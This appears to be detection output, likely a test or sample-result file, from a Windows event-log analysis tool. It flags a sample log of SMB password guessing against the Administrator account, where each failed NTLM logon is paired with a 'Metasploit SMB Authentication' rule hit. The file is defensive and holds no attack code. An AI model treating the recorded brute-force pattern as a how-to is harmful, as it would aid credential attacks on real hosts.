+2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8MnnaSRs0bnYVlMX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YgqavZ1SuNvX7RgH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IQvoIsfW0LhDit2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 33IPGQXc1MarY30J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: II4Ly9LnkWlq60Ux  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wncfJC7kDSI7O9Ud  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6XzbWef3PuzQK3FJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5M5670HdNC6c8O56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ea8FcddgLyV5o6oL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LjyhmKFdBNrHIvTJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PIF47pEWBMp6Nbym  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6TO891WvJPkdjsct  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6cLnJYpHEzGAvhWG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gy6cFTrwrpRQFxfQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gxz612Z88PMCKzAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GSPC8hibdZdyOcex  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6vlmykLeFmuhn81B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4w4lEW9w53zMFPcc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jt2lDRFWwi6adwlB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G9MGvle35u5OGB5o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJgLFM2vrnKuj5N3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l8HRyDAzwKj9bfnA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J65LcwnRgEob9wjY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yhas9e1fwDZ1Fxvt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5qJRSpjS6tZJjNQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bo4HAgP2tw0GmZ4o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zv0cbLCD7E05i0g5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FIKsQLk5iPyKoeqM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RiHAaBszJBGe2deQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8em4eOiqze683Cj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86lXQsnn7dae93tW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Iu8olNGPmhxh6iNu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qZYtN5EMHxcNqID6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mtUQGxrMoPkpUQCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QYh4e3bpePhDoRwr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UkC8E9uKpCgD1BHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ZCDxpmDZbpGCey3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SS2dxS3WvCrAyiB2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YT3VHxKNf8q14rro  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fx9HQT3u3Ig6vJ3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FukPQsr4SXRshyTn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7AutKUyPELNRUcA4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 38gBkWcYdZW6Wcdz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HMKnLRQCDn1CHZdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ShGnRYHfVSuPvfcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
